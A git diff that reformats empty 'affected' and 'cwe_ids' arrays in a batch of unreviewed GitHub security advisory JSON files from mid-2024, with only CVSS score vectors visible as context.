diff --git a/advisories/unreviewed/2024/06/GHSA-rx9g-4r6p-jpgq/GHSA-rx9g-4r6p-jpgq.json b/advisories/unreviewed/2024/06/GHSA-rx9g-4r6p-jpgq/GHSA-rx9g-4r6p-jpgq.json
index 3a23c118807..fa296e2471a 100644
--- a/advisories/unreviewed/2024/06/GHSA-rx9g-4r6p-jpgq/GHSA-rx9g-4r6p-jpgq.json
+++ b/advisories/unreviewed/2024/06/GHSA-rx9g-4r6p-jpgq/GHSA-rx9g-4r6p-jpgq.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-v93q-27w5-6jq6/GHSA-v93q-27w5-6jq6.json b/advisories/unreviewed/2024/06/GHSA-v93q-27w5-6jq6/GHSA-v93q-27w5-6jq6.json
index fadc6aeaf67..a59c4921ea0 100644
--- a/advisories/unreviewed/2024/06/GHSA-v93q-27w5-6jq6/GHSA-v93q-27w5-6jq6.json
+++ b/advisories/unreviewed/2024/06/GHSA-v93q-27w5-6jq6/GHSA-v93q-27w5-6jq6.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-xrmw-792x-crvf/GHSA-xrmw-792x-crvf.json b/advisories/unreviewed/2024/06/GHSA-xrmw-792x-crvf/GHSA-xrmw-792x-crvf.json
index 22dfae9c49e..5c0258fed88 100644
--- a/advisories/unreviewed/2024/06/GHSA-xrmw-792x-crvf/GHSA-xrmw-792x-crvf.json
+++ b/advisories/unreviewed/2024/06/GHSA-xrmw-792x-crvf/GHSA-xrmw-792x-crvf.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-39r5-2x63-hpq5/GHSA-39r5-2x63-hpq5.json b/advisories/unreviewed/2024/07/GHSA-39r5-2x63-hpq5/GHSA-39r5-2x63-hpq5.json
index 736fa826186..5bdce5dfe8d 100644
--- a/advisories/unreviewed/2024/07/GHSA-39r5-2x63-hpq5/GHSA-39r5-2x63-hpq5.json
+++ b/advisories/unreviewed/2024/07/GHSA-39r5-2x63-hpq5/GHSA-39r5-2x63-hpq5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-3c5h-r3rf-6pjg/GHSA-3c5h-r3rf-6pjg.json b/advisories/unreviewed/2024/07/GHSA-3c5h-r3rf-6pjg/GHSA-3c5h-r3rf-6pjg.json
index 463c8bb2648..e6fb95a0bfa 100644
--- a/advisories/unreviewed/2024/07/GHSA-3c5h-r3rf-6pjg/GHSA-3c5h-r3rf-6pjg.json
+++ b/advisories/unreviewed/2024/07/GHSA-3c5h-r3rf-6pjg/GHSA-3c5h-r3rf-6pjg.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-3pc3-vcqg-prf6/GHSA-3pc3-vcqg-prf6.json b/advisories/unreviewed/2024/07/GHSA-3pc3-vcqg-prf6/GHSA-3pc3-vcqg-prf6.json
index 0f9080413fc..4e74d0a1dbf 100644
--- a/advisories/unreviewed/2024/07/GHSA-3pc3-vcqg-prf6/GHSA-3pc3-vcqg-prf6.json
+++ b/advisories/unreviewed/2024/07/GHSA-3pc3-vcqg-prf6/GHSA-3pc3-vcqg-prf6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-428g-3m2x-46jh/GHSA-428g-3m2x-46jh.json b/advisories/unreviewed/2024/07/GHSA-428g-3m2x-46jh/GHSA-428g-3m2x-46jh.json
index 829547ee4bf..0861b097df7 100644
--- a/advisories/unreviewed/2024/07/GHSA-428g-3m2x-46jh/GHSA-428g-3m2x-46jh.json
+++ b/advisories/unreviewed/2024/07/GHSA-428g-3m2x-46jh/GHSA-428g-3m2x-46jh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-4832-c6xm-3mhf/GHSA-4832-c6xm-3mhf.json b/advisories/unreviewed/2024/07/GHSA-4832-c6xm-3mhf/GHSA-4832-c6xm-3mhf.json
index 0da1d6ab243..965685c85e9 100644
--- a/advisories/unreviewed/2024/07/GHSA-4832-c6xm-3mhf/GHSA-4832-c6xm-3mhf.json
+++ b/advisories/unreviewed/2024/07/GHSA-4832-c6xm-3mhf/GHSA-4832-c6xm-3mhf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-5m5g-r44m-96r4/GHSA-5m5g-r44m-96r4.json b/advisories/unreviewed/2024/07/GHSA-5m5g-r44m-96r4/GHSA-5m5g-r44m-96r4.json
index d0527316dcc..dcc1e903137 100644
--- a/advisories/unreviewed/2024/07/GHSA-5m5g-r44m-96r4/GHSA-5m5g-r44m-96r4.json
+++ b/advisories/unreviewed/2024/07/GHSA-5m5g-r44m-96r4/GHSA-5m5g-r44m-96r4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-5rh9-9jwh-jhmh/GHSA-5rh9-9jwh-jhmh.json b/advisories/unreviewed/2024/07/GHSA-5rh9-9jwh-jhmh/GHSA-5rh9-9jwh-jhmh.json
index 210b4238c7c..459cb86e076 100644
--- a/advisories/unreviewed/2024/07/GHSA-5rh9-9jwh-jhmh/GHSA-5rh9-9jwh-jhmh.json
+++ b/advisories/unreviewed/2024/07/GHSA-5rh9-9jwh-jhmh/GHSA-5rh9-9jwh-jhmh.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-69mq-rrf6-hxmf/GHSA-69mq-rrf6-hxmf.json b/advisories/unreviewed/2024/07/GHSA-69mq-rrf6-hxmf/GHSA-69mq-rrf6-hxmf.json
index 8d780ff9107..5b91bb71d1a 100644
--- a/advisories/unreviewed/2024/07/GHSA-69mq-rrf6-hxmf/GHSA-69mq-rrf6-hxmf.json
+++ b/advisories/unreviewed/2024/07/GHSA-69mq-rrf6-hxmf/GHSA-69mq-rrf6-hxmf.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:X/RE:L/U:Amber"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-6fq4-3v58-2pfx/GHSA-6fq4-3v58-2pfx.json b/advisories/unreviewed/2024/07/GHSA-6fq4-3v58-2pfx/GHSA-6fq4-3v58-2pfx.json
index 69045b7f2af..cd9404abf5f 100644
--- a/advisories/unreviewed/2024/07/GHSA-6fq4-3v58-2pfx/GHSA-6fq4-3v58-2pfx.json
+++ b/advisories/unreviewed/2024/07/GHSA-6fq4-3v58-2pfx/GHSA-6fq4-3v58-2pfx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-9f65-vvw4-5hh3/GHSA-9f65-vvw4-5hh3.json b/advisories/unreviewed/2024/07/GHSA-9f65-vvw4-5hh3/GHSA-9f65-vvw4-5hh3.json
index 9ca4ed9e6b4..bb9ffe71a10 100644
--- a/advisories/unreviewed/2024/07/GHSA-9f65-vvw4-5hh3/GHSA-9f65-vvw4-5hh3.json
+++ b/advisories/unreviewed/2024/07/GHSA-9f65-vvw4-5hh3/GHSA-9f65-vvw4-5hh3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-9p4c-hx77-454x/GHSA-9p4c-hx77-454x.json b/advisories/unreviewed/2024/07/GHSA-9p4c-hx77-454x/GHSA-9p4c-hx77-454x.json
index c4aea9fd2fb..9475e159ca6 100644
--- a/advisories/unreviewed/2024/07/GHSA-9p4c-hx77-454x/GHSA-9p4c-hx77-454x.json
+++ b/advisories/unreviewed/2024/07/GHSA-9p4c-hx77-454x/GHSA-9p4c-hx77-454x.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-ccqp-9wwv-6xmj/GHSA-ccqp-9wwv-6xmj.json b/advisories/unreviewed/2024/07/GHSA-ccqp-9wwv-6xmj/GHSA-ccqp-9wwv-6xmj.json
index 663b4444417..47bcc5bf932 100644
--- a/advisories/unreviewed/2024/07/GHSA-ccqp-9wwv-6xmj/GHSA-ccqp-9wwv-6xmj.json
+++ b/advisories/unreviewed/2024/07/GHSA-ccqp-9wwv-6xmj/GHSA-ccqp-9wwv-6xmj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-g369-3j35-3453/GHSA-g369-3j35-3453.json b/advisories/unreviewed/2024/07/GHSA-g369-3j35-3453/GHSA-g369-3j35-3453.json
index e457622c25f..00c2f307d33 100644
--- a/advisories/unreviewed/2024/07/GHSA-g369-3j35-3453/GHSA-g369-3j35-3453.json
+++ b/advisories/unreviewed/2024/07/GHSA-g369-3j35-3453/GHSA-g369-3j35-3453.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-g7wm-rhw5-7wrp/GHSA-g7wm-rhw5-7wrp.json b/advisories/unreviewed/2024/07/GHSA-g7wm-rhw5-7wrp/GHSA-g7wm-rhw5-7wrp.json
index cbff3c16327..5677bbcc1b5 100644
--- a/advisories/unreviewed/2024/07/GHSA-g7wm-rhw5-7wrp/GHSA-g7wm-rhw5-7wrp.json
+++ b/advisories/unreviewed/2024/07/GHSA-g7wm-rhw5-7wrp/GHSA-g7wm-rhw5-7wrp.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-gch4-6c9x-v2fr/GHSA-gch4-6c9x-v2fr.json b/advisories/unreviewed/2024/07/GHSA-gch4-6c9x-v2fr/GHSA-gch4-6c9x-v2fr.json
index 139f2a3bd43..1286c0c6f2d 100644
--- a/advisories/unreviewed/2024/07/GHSA-gch4-6c9x-v2fr/GHSA-gch4-6c9x-v2fr.json
+++ b/advisories/unreviewed/2024/07/GHSA-gch4-6c9x-v2fr/GHSA-gch4-6c9x-v2fr.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:X/RE:X/U:Amber"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-gg52-x92p-v5qj/GHSA-gg52-x92p-v5qj.json b/advisories/unreviewed/2024/07/GHSA-gg52-x92p-v5qj/GHSA-gg52-x92p-v5qj.json
index 52973faf7ae..c922245be83 100644
--- a/advisories/unreviewed/2024/07/GHSA-gg52-x92p-v5qj/GHSA-gg52-x92p-v5qj.json
+++ b/advisories/unreviewed/2024/07/GHSA-gg52-x92p-v5qj/GHSA-gg52-x92p-v5qj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-grwm-7vmp-5mcp/GHSA-grwm-7vmp-5mcp.json b/advisories/unreviewed/2024/07/GHSA-grwm-7vmp-5mcp/GHSA-grwm-7vmp-5mcp.json
index 82c109e59b5..746e2d7bb26 100644
--- a/advisories/unreviewed/2024/07/GHSA-grwm-7vmp-5mcp/GHSA-grwm-7vmp-5mcp.json
+++ b/advisories/unreviewed/2024/07/GHSA-grwm-7vmp-5mcp/GHSA-grwm-7vmp-5mcp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-hf94-2x3f-x6rc/GHSA-hf94-2x3f-x6rc.json b/advisories/unreviewed/2024/07/GHSA-hf94-2x3f-x6rc/GHSA-hf94-2x3f-x6rc.json
index e6754d68027..976adf465a4 100644
--- a/advisories/unreviewed/2024/07/GHSA-hf94-2x3f-x6rc/GHSA-hf94-2x3f-x6rc.json
+++ b/advisories/unreviewed/2024/07/GHSA-hf94-2x3f-x6rc/GHSA-hf94-2x3f-x6rc.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Amber"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-hx98-fgmp-472p/GHSA-hx98-fgmp-472p.json b/advisories/unreviewed/2024/07/GHSA-hx98-fgmp-472p/GHSA-hx98-fgmp-472p.json
index 76fc0ec503c..f4fcbd7a769 100644
--- a/advisories/unreviewed/2024/07/GHSA-hx98-fgmp-472p/GHSA-hx98-fgmp-472p.json
+++ b/advisories/unreviewed/2024/07/GHSA-hx98-fgmp-472p/GHSA-hx98-fgmp-472p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-jwvr-83h7-5ch5/GHSA-jwvr-83h7-5ch5.json b/advisories/unreviewed/2024/07/GHSA-jwvr-83h7-5ch5/GHSA-jwvr-83h7-5ch5.json
index 116f7ca177a..af6cc552e22 100644
--- a/advisories/unreviewed/2024/07/GHSA-jwvr-83h7-5ch5/GHSA-jwvr-83h7-5ch5.json
+++ b/advisories/unreviewed/2024/07/GHSA-jwvr-83h7-5ch5/GHSA-jwvr-83h7-5ch5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-mg4c-989q-gh96/GHSA-mg4c-989q-gh96.json b/advisories/unreviewed/2024/07/GHSA-mg4c-989q-gh96/GHSA-mg4c-989q-gh96.json
index 19fc42a8ffb..fd05b66c517 100644
--- a/advisories/unreviewed/2024/07/GHSA-mg4c-989q-gh96/GHSA-mg4c-989q-gh96.json
+++ b/advisories/unreviewed/2024/07/GHSA-mg4c-989q-gh96/GHSA-mg4c-989q-gh96.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-mg8p-r739-mwgq/GHSA-mg8p-r739-mwgq.json b/advisories/unreviewed/2024/07/GHSA-mg8p-r739-mwgq/GHSA-mg8p-r739-mwgq.json
index 6eb78998754..bebef9dc4c3 100644
--- a/advisories/unreviewed/2024/07/GHSA-mg8p-r739-mwgq/GHSA-mg8p-r739-mwgq.json
+++ b/advisories/unreviewed/2024/07/GHSA-mg8p-r739-mwgq/GHSA-mg8p-r739-mwgq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-mmj4-7r77-pw6q/GHSA-mmj4-7r77-pw6q.json b/advisories/unreviewed/2024/07/GHSA-mmj4-7r77-pw6q/GHSA-mmj4-7r77-pw6q.json
index 5018ebca6d8..09c4e7fc78e 100644
--- a/advisories/unreviewed/2024/07/GHSA-mmj4-7r77-pw6q/GHSA-mmj4-7r77-pw6q.json
+++ b/advisories/unreviewed/2024/07/GHSA-mmj4-7r77-pw6q/GHSA-mmj4-7r77-pw6q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-p46f-3938-pv7g/GHSA-p46f-3938-pv7g.json b/advisories/unreviewed/2024/07/GHSA-p46f-3938-pv7g/GHSA-p46f-3938-pv7g.json
index f3bb1ca3f1b..7d983a4e757 100644
--- a/advisories/unreviewed/2024/07/GHSA-p46f-3938-pv7g/GHSA-p46f-3938-pv7g.json
+++ b/advisories/unreviewed/2024/07/GHSA-p46f-3938-pv7g/GHSA-p46f-3938-pv7g.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:X/V:C/RE:L/U:Amber"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-vv6q-q6px-fjgf/GHSA-vv6q-q6px-fjgf.json b/advisories/unreviewed/2024/07/GHSA-vv6q-q6px-fjgf/GHSA-vv6q-q6px-fjgf.json
index 43fa85ee872..49dbb7fc644 100644
--- a/advisories/unreviewed/2024/07/GHSA-vv6q-q6px-fjgf/GHSA-vv6q-q6px-fjgf.json
+++ b/advisories/unreviewed/2024/07/GHSA-vv6q-q6px-fjgf/GHSA-vv6q-q6px-fjgf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/07/GHSA-xrcw-9q57-9frw/GHSA-xrcw-9q57-9frw.json b/advisories/unreviewed/2024/07/GHSA-xrcw-9q57-9frw/GHSA-xrcw-9q57-9frw.json
index d623bfc5a5d..b53e805dbfc 100644
--- a/advisories/unreviewed/2024/07/GHSA-xrcw-9q57-9frw/GHSA-xrcw-9q57-9frw.json
+++ b/advisories/unreviewed/2024/07/GHSA-xrcw-9q57-9frw/GHSA-xrcw-9q57-9frw.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-4h6p-wphh-f8rf/GHSA-4h6p-wphh-f8rf.json b/advisories/unreviewed/2024/08/GHSA-4h6p-wphh-f8rf/GHSA-4h6p-wphh-f8rf.json
index fc3bc194997..01dfd8749e5 100644
--- a/advisories/unreviewed/2024/08/GHSA-4h6p-wphh-f8rf/GHSA-4h6p-wphh-f8rf.json
+++ b/advisories/unreviewed/2024/08/GHSA-4h6p-wphh-f8rf/GHSA-4h6p-wphh-f8rf.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-6cjc-w4j3-jjh8/GHSA-6cjc-w4j3-jjh8.json b/advisories/unreviewed/2024/08/GHSA-6cjc-w4j3-jjh8/GHSA-6cjc-w4j3-jjh8.json
index c3067e9c5ae..89877085b9c 100644
--- a/advisories/unreviewed/2024/08/GHSA-6cjc-w4j3-jjh8/GHSA-6cjc-w4j3-jjh8.json
+++ b/advisories/unreviewed/2024/08/GHSA-6cjc-w4j3-jjh8/GHSA-6cjc-w4j3-jjh8.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-86r9-mrqj-2v4f/GHSA-86r9-mrqj-2v4f.json b/advisories/unreviewed/2024/08/GHSA-86r9-mrqj-2v4f/GHSA-86r9-mrqj-2v4f.json
index 0e5950f12f2..2be70e08943 100644
--- a/advisories/unreviewed/2024/08/GHSA-86r9-mrqj-2v4f/GHSA-86r9-mrqj-2v4f.json
+++ b/advisories/unreviewed/2024/08/GHSA-86r9-mrqj-2v4f/GHSA-86r9-mrqj-2v4f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/08/GHSA-8q4v-68hv-v55c/GHSA-8q4v-68hv-v55c.json b/advisories/unreviewed/2024/08/GHSA-8q4v-68hv-v55c/GHSA-8q4v-68hv-v55c.json
index 1bbc0ae56cf..ee59e75b472 100644
--- a/advisories/unreviewed/2024/08/GHSA-8q4v-68hv-v55c/GHSA-8q4v-68hv-v55c.json
+++ b/advisories/unreviewed/2024/08/GHSA-8q4v-68hv-v55c/GHSA-8q4v-68hv-v55c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/08/GHSA-9jp7-3q3j-jx4g/GHSA-9jp7-3q3j-jx4g.json b/advisories/unreviewed/2024/08/GHSA-9jp7-3q3j-jx4g/GHSA-9jp7-3q3j-jx4g.json
index 3f324117e40..af6c4934e10 100644
--- a/advisories/unreviewed/2024/08/GHSA-9jp7-3q3j-jx4g/GHSA-9jp7-3q3j-jx4g.json
+++ b/advisories/unreviewed/2024/08/GHSA-9jp7-3q3j-jx4g/GHSA-9jp7-3q3j-jx4g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-c2m5-cmpw-rjcx/GHSA-c2m5-cmpw-rjcx.json b/advisories/unreviewed/2024/08/GHSA-c2m5-cmpw-rjcx/GHSA-c2m5-cmpw-rjcx.json
index fadebb6048d..a0e62f2119e 100644
--- a/advisories/unreviewed/2024/08/GHSA-c2m5-cmpw-rjcx/GHSA-c2m5-cmpw-rjcx.json
+++ b/advisories/unreviewed/2024/08/GHSA-c2m5-cmpw-rjcx/GHSA-c2m5-cmpw-rjcx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-c844-4fjf-3jhf/GHSA-c844-4fjf-3jhf.json b/advisories/unreviewed/2024/08/GHSA-c844-4fjf-3jhf/GHSA-c844-4fjf-3jhf.json
index d57159cfd52..a08883b4b9f 100644
--- a/advisories/unreviewed/2024/08/GHSA-c844-4fjf-3jhf/GHSA-c844-4fjf-3jhf.json
